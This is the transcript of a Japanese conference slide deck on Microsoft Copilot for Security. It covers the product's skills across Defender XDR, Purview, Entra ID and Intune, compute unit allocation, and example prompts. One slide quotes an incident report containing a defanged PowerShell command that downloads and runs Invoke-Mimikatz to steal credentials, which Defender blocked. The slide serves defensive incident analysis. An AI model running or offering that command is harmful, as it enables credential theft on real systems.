Lock in $30 Savings on PRO—Offer Ends Soon! ⏳

なんでもCopilot for Security

なんでもCopilot for Security

2024年8月14日開催 「なんでもCopilot」の登壇資料

Kunii, Suguru

August 14, 2024
Tweet

More Decks by Kunii, Suguru

Other Decks in Technology

Transcript

  1. 2 自己紹介 • 国井 傑 (くにい すぐる) • 株式会社エストディアン 所属

    • 公立大学法人会津大学 客員教授 • マイクロソフト認定トレーナー (1997~2025) • Microsoft MVP for Security (2006~2025) • ブログ https://AzureAD.net • 主な職務・実績 • Microsoft 365 セキュリティ/インフラ管理に関わる トレーニング • テクニカル ライター • ひと目でわかる Microsoft Defender for Endpoint • 最短突破 Microsoft Azure セキュリティテクノロジ合格教本 • ひと目でわかる Microsoft Intune など
  2. 6

  3. 7 もうちょっとわかりやすくすると.. Copilot for Security Microsoft Defender TI / EASM

    Microsoft Sentinel urlscan Microsoft Entra ID Microsoft Intune Microsoft Defender XDR Microsoft Purview 調査対象 過去ログの参照 脅威情報の参照
  4. 8 SCU の割り当て Copilot for Security Microsoft Entra ID Microsoft

    Intune Microsoft Defender XDR Microsoft Purview 調査対象 Security Compute Unit (SCU) Microsoft Azure
  5. 12 • 埋め込み型から利用可能なスキル • インシデント概要解説 • ファイルの解説 • プロセスのコマンド解説 •

    自然言語からクエリの作成 • インシデント レポート • スタンドアロン型から利用可能なスキル • 上記の内容 • インシデントに関連する IOC と TTP • 脆弱性の管理 (CVE, ASR) スキル
  6. 17 インシデント レポートから概要を把握 重要度の高いインシデント「1つのエンドポイント上のMimikatz認証 情報盗難ツール」は、2024-06-10 10:18:07 UTC ~ 2024-06-10 10:18:18

    UTCの間に発生しました。 クレデンシャルアクセス:2024-06-10 10:18:07 UTCにおいて、 Mimikatz認証情報盗難ツールがデバイス「xxxxx」(Windows 10)上で検出され、ユーザー「SuguruKUNII」に影響を与えました。 このツールはプロセス「cmd.exe」に関連していた。 その直後、同時に「xxxxx」上のDefenderが、コマンドライン 「C:¥Windows¥System32¥WindowsPowerShell¥v1.0」内の 「HackTool:PowerShell/Mimikatz.B」の実行を阻止した。exe powershell -c IEX(New-Object System.Net.WebClient).DownloadString(¥u0027hxxps://raw .githubusercontent.com/g4uss47/Invoke- Mimikatz/master/Invoke-Mimikatz.ps1u0027);Invoke- Mimikatz'.この操作により、「SuguruKUNII」からの認証情報の盗 難の可能性がなくなった。
  7. 24 • 埋め込み型から利用可能なスキル • DLP アラートの説明 • 内部リスクの管理アラートの詳細 • スタンドアロン型から利用可能なスキル

    • 秘密度ラベル • DLP • 内部リスクの管理 • プロンプト例 • 上記の内容 • 優先すべきDLPアラート • ユーザーについての詳細 (アラートにどうかかわっているか?を調査) • DLP アラートに関連するデータリスクは何か • DLP アラートに関連するファイルについて過去7日間で行われたこと • 特定のファイルに対して設定されている秘密度ラベルについて スキルとプロンプト例
  8. 30 • 埋め込み型から利用可能なスキル • Identity Protection によって検知されたサインイン/ユーザー リスクの解説 • スタンドアロン型から利用可能なスキル

    • ユーザー/グループの情報 • サインインログ/監査ログの情報 • プロンプト例 • Identity Protection に出力されたログの要約 • 特定の日付、特定のユーザーによるサインイン履歴の追跡 • 過去14日間でサインインしたユーザーの一覧 • Microsoft Teams 以外のサービスにアクセスしたゲスト ユーザーの一覧 • 過去7日間で削除されたユーザー • アプリの登録に特定のアプリを登録したユーザーの追跡 スキルとプロンプト例
  9. 34 • 埋め込み型から利用可能なスキル • デバイスの探索/別のデバイスとの比較 • エラーコードの分析 • 構成プロファイル/コンプライアンスポリシーの集計 (説明)

    • 構成プロファイル/コンプライアンスポリシー/セキュリティベースラインの項目説明 • スタンドアロン型から利用可能なスキル • デバイスの情報 • ユーザー/デバイスを起点とするアプリの情報 スキル
  10. 35 • プロンプト例 • 構成プロファイルの解説 • デバイスのハードウェア構成の比較 • 非準拠デバイスの非準拠理由 •

    エラーコードの解説 • 特定ユーザーが利用しているデバイス一覧 • 特定デバイスにインストールしたアプリ一覧 • DeviceA デバイスと DeviceB デバイス間のコンプライアンス ポリシーの類似点は何ですか? • DeviceA と DeviceB のデバイス構成プロファイルの違いは何ですか? • DeviceA と DeviceB にインストールされているアプリケーションを比較 プロンプト例
  11. 38 結果 Intune の設定 "ウィジェットを許可する" について説明します。この設定は、デバイス上のウィジェット機能が 許可されるかどうかを指定します。ウィジェットは、ユーザーがカスタマイズできるニュースとフィードのサービスで、 このサービスをオフにすると、このサービスを使用しているアプリが動作を停止する可能性があります。 この設定は、ウィジェット体験全体に適用され、タスクバー上のコンテンツを含みます。デフォルトではウィジェットは オンになっており、設定で変更しない限り、以前にこの機能をオンにした場合は自動的にオンになります。

    設定の詳細は以下の通りです: •形式: int •アクセスタイプ:追加、削除、取得、置換 •デフォルト値: 1 許可される値: •0:許可されません。 •1(デフォルト):許可されます。 この設定は、グループポリシーまたはMDMソリューション(Microsoft Intuneなど)のカスタム設定を使用して ウィジェットをオフにすることができます。グループポリシーの場合、Intuneの設定カタログでも利用可能な 「ウィジェットを許可する」ポリシーを使用できます。MDMソリューションの場合、NewsandInterests設定 プロバイダ(CSP)のAllowNewsAndInterests設定を使用できます。 この設定は、以下の範囲とエディションで適用可能です: •スコープ:デバイス •エディション:Pro、Enterprise、Education、Windows SE、IoT Enterprise / IoT Enterprise LTSC •適用可能なOS:Windows 11, version 21H2 [10.0.22000] 以降
  12. 39 まとめ Copilot for Security Microsoft Defender TI / EASM

    Microsoft Sentinel urlscan Microsoft Entra ID Microsoft Intune Microsoft Defender XDR Microsoft Purview プロンプトブック 会社のインシデント 対応フローを実装 調査対象 不要なゲストユーザーを 見極める エラーコードの検索 インシデントの概要 特定エンティティの調査 レポート作成 過去ログの参照 脅威情報の参照 秘密度ラベルの設定変更 DLP のアラートを繰り返し 行うユーザーの追跡 ファイル プロンプトで利用する データをあらかじめ登録